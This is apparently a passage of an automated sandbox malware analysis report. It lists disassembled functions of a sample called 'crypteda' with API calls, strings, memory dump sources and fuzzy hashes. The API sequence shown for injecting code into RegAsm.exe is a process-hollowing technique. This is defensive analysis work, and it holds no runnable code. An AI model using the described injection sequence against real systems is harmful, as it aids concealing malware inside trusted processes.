WriteProcessMemory, xrefs: 02582670
VirtualAlloc, xrefs: 02582624
GetP, xrefs: 025825DF
SetThreadContext, xrefs: 02582683
TerminateProcess, xrefs: 0258275B
GetThreadContext, xrefs: 02582637
CreateProcessA, xrefs: 02582611
ResumeThread, xrefs: 02582699
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 025826CB
Load, xrefs: 0258259B

Memory Dump Source

Source File: 0000000B.00000002.2721267400.0000000002582000.00000040.00000800.00020000.00000000.sdmp, Offset: 02582000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2582000_crypteda.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction ID: fcbb95db90b51998a436645f4dae7a8d498eaf1693f36e7921eaf02ed2d2ec32
Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction Fuzzy Hash: E3B1E47664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CEB341D774FA518B94

Function 023C1001 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 023C1082

Strings

nC, xrefs: 023C1027

Memory Dump Source

Source File: 0000000B.00000002.2721124031.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23c0000_crypteda.jbxd

Similarity

API ID: ProtectVirtual
String ID: nC
API String ID: 544645111-2831220359
Opcode ID: bfceb204bcd10f475dcefe104bf425bf0c71db8930de7e8cb73d63241e15e243
Instruction ID: c2b21f278ed0ca83c9ab0d061adfe54b574c3314adc84439d46cdbacbaa8efd0
Opcode Fuzzy Hash: bfceb204bcd10f475dcefe104bf425bf0c71db8930de7e8cb73d63241e15e243
Instruction Fuzzy Hash: E421F9B1D012599FCB10DFAAC885AEEFBB4FF48724F10851AE518B7240C7755954CBE0

Function 023C1008 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 023C1082

Strings

nC, xrefs: 023C1027

Memory Dump Source

Source File: 0000000B.00000002.2721124031.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23c0000_crypteda.jbxd

Similarity

API ID: ProtectVirtual
String ID: nC
API String ID: 544645111-2831220359
Opcode ID: 40e70b63606456373bd7d2e8e04018b30b8052848180320d430615b498481b96
Instruction ID: 16517e795390edac4d3d0283c45aba21941535b8eb86d2a06bc852033d5b7592
Opcode Fuzzy Hash: 40e70b63606456373bd7d2e8e04018b30b8052848180320d430615b498481b96
Instruction Fuzzy Hash: 382108B1D012599FCB10DFAAC885AEEFBB4FF48714F10851AE518B7240C7795954CBE0

Analysis Process: RegAsm.exePID: 6332, Parent PID: 2448COMMON

Execution Graph

Execution Coverage:	5.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	60

Executed Functions

Function 0041FE9D Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041FB56: CreateFileW.KERNELBASE(?,00000000,?,0041FF46,?,?,00000000,?,0041FF46,?,0000000C), ref: 0041FB73

GetLastError.KERNEL32 ref: 0041FFB1
__dosmaperr.LIBCMT ref: 0041FFB8
GetFileType.KERNELBASE(00000000), ref: 0041FFC4
GetLastError.KERNEL32 ref: 0041FFCE
__dosmaperr.LIBCMT ref: 0041FFD7
CloseHandle.KERNEL32(00000000), ref: 0041FFF7
CloseHandle.KERNEL32(?), ref: 00420144
GetLastError.KERNEL32 ref: 00420176
__dosmaperr.LIBCMT ref: 0042017D

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 8a6ad238e456dfb5c6acf6d43a8fdbc71dc0bcedd465f29062b7f109bfad7472
Instruction ID: bfa7e2cc036e27e26c30110013f893a37d44138e153881355e96e1974d99462b
Opcode Fuzzy Hash: 8a6ad238e456dfb5c6acf6d43a8fdbc71dc0bcedd465f29062b7f109bfad7472
Instruction Fuzzy Hash: 6AA14832A041148FCF19EF68EC91BAE3BA0AB06314F14016EF801EB3D2C7799857DB59

Function 004038B0 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 401
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(shell32.dll), ref: 004038FA

Strings

shell32.dll, xrefs: 004038F5
open, xrefs: 00403DF4, 00403E15
` H, xrefs: 0040392E
.exe, xrefs: 004039D4, 004039E5, 00403C18, 00403C29

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .exe$` H$open$shell32.dll
API String ID: 1029625771-2834257608
Opcode ID: d4c97a5889b133242607335a8d42e56c099b9df17a057e4e584b721371644320
Instruction ID: 857efcede616dcd8c83fca5595c578517c5b7e2349eff73c2340159bc27b1389
Opcode Fuzzy Hash: d4c97a5889b133242607335a8d42e56c099b9df17a057e4e584b721371644320
Instruction Fuzzy Hash: F7E118312083408BE328DF28CD45B6FBBE5BF85305F144A2DF485AB2D2D779E5458B9A

Function 00411422 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,0041141C,00000016,0040BD88,?,?,F3E50315,0040BD88,?), ref: 00411433
TerminateProcess.KERNEL32(00000000,?,0041141C,00000016,0040BD88,?,?,F3E50315,0040BD88,?), ref: 0041143A
ExitProcess.KERNEL32 ref: 0041144C

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
Instruction ID: 9f5cffd960a9e5e784bd49b974cdbcfa3e36e1e28e8dab912b0267a8a3414f4f
Opcode Fuzzy Hash: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
Instruction Fuzzy Hash: 76D09E31100508AFCF117F61DC0DA993F2AAF44745B858025BA0556131CB3A9993EA5D

Function 00416D9F Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004164B2: GetConsoleOutputCP.KERNEL32(F3E50315,00000000,00000000,0040BDA8), ref: 00416515

WriteFile.KERNELBASE(FFBF5BE8,00000000,?,0040BC65,00000000,00000000,00000000,00000000,?,?,0040BC65,?,?,004328B8,00000010,0040BDA8), ref: 00416F08
GetLastError.KERNEL32(?,0040BC65,?,?,004328B8,00000010,0040BDA8,?,?,00000000,?), ref: 00416F12

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
Instruction ID: 2fa65d471856ac80343e11fa98bfc53c13d7c1330e77fa5001ed2fcda6fa269c
Opcode Fuzzy Hash: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
Instruction Fuzzy Hash: 9F61D675D00249AFDF10DFA9C844AEF7FB9AF09308F16415AF800A7252D339D986CB69

Function 00414D4D Relevance: 3.1, APIs: 2, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00414C34,00000000,CF830579,00432C48,0000000C,00414CF0,0040BCFB,?), ref: 00414DA3
GetLastError.KERNEL32(?,00414C34,00000000,CF830579,00432C48,0000000C,00414CF0,0040BCFB,?), ref: 00414DAD

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
Instruction ID: 85074f4f6ff141bd7efcce855698502eef5de44000b51f9bf88cca9df30e92f5
Opcode Fuzzy Hash: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
Instruction Fuzzy Hash: 77114C326041105ACB206675BC857FE27459BD2738F25025FF908C72C2EB388CC1529D

Function 00403ED0 Relevance: 3.0, APIs: 2, Instructions: 22
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,004038B0,00000000,00000000,F3E50315), ref: 00403EF6
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403EFF

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleThreadWait
String ID:
API String ID: 1891408510-0
Opcode ID: 9419f3325bceeff1f49f4aa1ba74e54397c78aa36a806008d2e466c127b4d74a
Instruction ID: 586eb301f3ad505b2fb8a5e2c0845f04df15ed7da879dad1818cca3ffdf321d7
Opcode Fuzzy Hash: 9419f3325bceeff1f49f4aa1ba74e54397c78aa36a806008d2e466c127b4d74a
Instruction Fuzzy Hash: 7EE08675748300ABD720FF24DC07F1A3BE4BB48B01F914A39F595A62D0D6747404965E

Function 004143BC Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
Instruction ID: 2b8528776d8d16502f0b8a76a82d10506d50424a6c704f85483994a1d03f90d6
Opcode Fuzzy Hash: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
Instruction Fuzzy Hash: 9D012D377001255FDF25CE6EEC40BDB3396EBC47243548536F914DB544DA34D8829759

Function 00413EE2 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 00413F1C

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: caa3c88317b3bbee83e5854bbea9c678844db8772e50a39c133be3f8c5400fb7
Instruction ID: ec9553a80a63d261aca480410fc230252e3ea256619d772961208cbce9478613
Opcode Fuzzy Hash: caa3c88317b3bbee83e5854bbea9c678844db8772e50a39c133be3f8c5400fb7
Instruction Fuzzy Hash: F6111871A0420AAFCF05DF58E9419DF7BF4EF48304F0440AAF805AB351D631DA15CBA8

Function 0041FB56 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,00000000,?,0041FF46,?,?,00000000,?,0041FF46,?,0000000C), ref: 0041FB73

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
Instruction ID: 28cfbda6749b70c9de2fbd9d245fef773b8951bf2dd70127050a9a6bf190398c
Opcode Fuzzy Hash: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
Instruction Fuzzy Hash: 05D06C3210010DFBDF128F84DC06EDA3FAAFB4C714F018010FA5856021C732E832AB94

Non-executed Functions

Function 0041EB91 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(3FC00000,2000000B,0041EEAF,00000002,00000000,?,?,?,0041EEAF,?,00000000), ref: 0041EC2A
GetLocaleInfoW.KERNEL32(3FC00000,20001004,0041EEAF,00000002,00000000,?,?,?,0041EEAF,?,00000000), ref: 0041EC53
GetACP.KERNEL32(?,?,0041EEAF,?,00000000), ref: 0041EC68

Strings

ACP, xrefs: 0041EBAF
OCP, xrefs: 0041EBE5

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
Instruction ID: c85fc144d60ddc6525dae33cd09e0d060d1fedf04b2ffe12a12074c054b5e7b8
Opcode Fuzzy Hash: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
Instruction Fuzzy Hash: 0D218E3A704104EADB38CF16CD05AD772A6AB54B54B5A8426ED0AD7304F73ADEC1C798

Function 0041ED66 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0041EE72
IsValidCodePage.KERNEL32(00000000), ref: 0041EEBB
IsValidLocale.KERNEL32(?,00000001), ref: 0041EECA
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0041EF12
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0041EF31

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: cb1f43e0842fc1b57530168fcb5aadb50c479eb7f68bca799765aa874482350f
Instruction ID: 6dcde63b9ee3f13586b647639649f64518bbb4cfa058cf0b9fa01e7f3d3dbd24
Opcode Fuzzy Hash: cb1f43e0842fc1b57530168fcb5aadb50c479eb7f68bca799765aa874482350f
Instruction Fuzzy Hash: 2951A075A00206ABDF20EFA6DC45AEB77B8BF04700F49452AED11E7290D7789981CB69

Function 0041E402 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetACP.KERNEL32(?,?,?,?,?,?,00411ED1,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E4C3
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00411ED1,?,?,?,00000055,?,-00000050,?,?), ref: 0041E4EE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E651

Strings

utf8, xrefs: 0041E5C0

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 1eb3fb8f5e23b37753c7c554b08859c7808b39e1099525de27aec97b4695ee5a
Instruction ID: e1a377e19c5f71cd44c11824ea9e35987c280acd53c56ff76f51ea565ef0af36
Opcode Fuzzy Hash: 1eb3fb8f5e23b37753c7c554b08859c7808b39e1099525de27aec97b4695ee5a
Instruction Fuzzy Hash: AB71F779A00201BADB24AB77CC46BEB73A9EF44718F14442BFD05D7281FA7CE9818659

Function 00415625 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004156B2

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
Instruction ID: a35172905f2c9e80df687ae2f548e4ff91b5a56ee58bfd6494556f9989062819
Opcode Fuzzy Hash: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
Instruction Fuzzy Hash: 44B16A72E00655DFDB11DF68C8817EEBBA5EF85310F14416BE815AB381D238DD81CBA9

Function 00407AF1 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407AFD
IsDebuggerPresent.KERNEL32 ref: 00407BC9
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00407BE9
UnhandledExceptionFilter.KERNEL32(?), ref: 00407BF3

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
Instruction ID: e6d40a2ad45d1a0383389914ec1c7b177219f7559a83785ff08c1c1c590c79bb
Opcode Fuzzy Hash: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
Instruction Fuzzy Hash: 76314975D0521CDBDB21DFA0D989BCDBBB8BF08304F1040AAE40DAB290EB755A85CF49

Function 0041E815 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E869
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E8B3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E979

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 70364720e12663236a414e2dcb1dce5353f717cfc86153b9853f2e5e3999c068
Instruction ID: 519a0177cb526aaaa458b2f6b8e716251f3c0a2969a148864a23d158d411bc59
Opcode Fuzzy Hash: 70364720e12663236a414e2dcb1dce5353f717cfc86153b9853f2e5e3999c068
Instruction Fuzzy Hash: 9B617B75A102079FEB289F26CD82BEA77A8FF44354F14417AED05C6681E738E981CB58

Function 0040DD68 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 0040DE60
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 0040DE6A
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 0040DE77

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: c9299be453f233d1f34e7b439eda9d176e6efb048eb56d82e46d8d1a49e6a2a2
Instruction ID: d2f4f48b52c025ad6b33b38734eeeb510d7991f02fac7d06ce453438f3003fcc
Opcode Fuzzy Hash: c9299be453f233d1f34e7b439eda9d176e6efb048eb56d82e46d8d1a49e6a2a2
Instruction Fuzzy Hash: A731C574D012289BCB21DF65D98978DBBB4BF58310F5041EAE41CA7290E7749F858F49

Function 0041B6DA Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 240dabf42296fc0716cf1df3a365cfd0642dfbeb5de634df910a17514a9db46b
Instruction ID: a6190f5805de9a564eec38dffe1fad162b0df58d225cb52605cfe5cd4e5bec91
Opcode Fuzzy Hash: 240dabf42296fc0716cf1df3a365cfd0642dfbeb5de634df910a17514a9db46b
Instruction Fuzzy Hash: 8A41A2B5904219AFDB20DF69CC89AEEBBB8EF45304F1441DEE418D3201DB359E858F54

Function 0041EA68 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041EABC

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 9d790b3c45bb2bf0643d5e8ab68d8f402ebc04587a63254904ddd76dacdf4023
Instruction ID: 789565f62a9f3b81efb00754059a0722f9dd97d30215528fd29c40c366a42c5d
Opcode Fuzzy Hash: 9d790b3c45bb2bf0643d5e8ab68d8f402ebc04587a63254904ddd76dacdf4023
Instruction Fuzzy Hash: F1217136605206ABDB28DE26DC42AFB77A8EF44714B10407FFD06D6241EB79BD81CA58

Function 0041E6EF Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

EnumSystemLocalesW.KERNEL32(0041E815,00000001,00000000,?,-00000050,?,0041EE46,00000000,?,?,?,00000055,?), ref: 0041E761

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: c41bd8c13944af45959f55b7b285689f368a5b2ee216d29e3bbf5953bd320f82
Instruction ID: 3355e78b0c1919935c13ae0f7f932fd25516bb8159513c05bc37ad2f76743b3e
Opcode Fuzzy Hash: c41bd8c13944af45959f55b7b285689f368a5b2ee216d29e3bbf5953bd320f82
Instruction Fuzzy Hash: 6911E93B6007019FEB189F3AD8916FAB791FF80358B19442EE99687740E7757983C744

Function 0041EC97 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0041EB12,00000000,00000000,?), ref: 0041ECC3

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: f78a423274370276909a02de998c8e2fb19ace7283c045400ea6aabaf7fbf6a9
Instruction ID: a74d281951bb25d9d225ee6b49b477873636137a5a6801bc69a0b20bd4e45b62
Opcode Fuzzy Hash: f78a423274370276909a02de998c8e2fb19ace7283c045400ea6aabaf7fbf6a9
Instruction Fuzzy Hash: BCF0A93AA00126BFDB245A269C45BFB7764EB40754F15442AED07A3280EA78FE82C6D4

Function 0041E5FD Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E651

Strings

utf8, xrefs: 0041E5C0

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: d3c02c1389eacca91a5e291a11e928c47885a93e678f07e32e4ca4d141b25baf
Instruction ID: c8b41ea417b063d59171f4d5afc3dd36f9caaff362045ecd69b67607d46fe07f
Opcode Fuzzy Hash: d3c02c1389eacca91a5e291a11e928c47885a93e678f07e32e4ca4d141b25baf
Instruction Fuzzy Hash: AFF0C836A10115ABC724AF35EC46FFA37E8EB88314F51057EFA02D7281DA7CAD458758

Function 0041E78A Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

EnumSystemLocalesW.KERNEL32(0041EA68,00000001,45F1B473,?,-00000050,?,0041EE0A,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0041E7D4

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 02464ed723b4c354a84e3378b332530d88ad943763cb876e16d480aee733ffc6
Instruction ID: 6c1b8be79df370ff527d3fdf83c27c448d8a6d1d4b53373dd59006919712f969
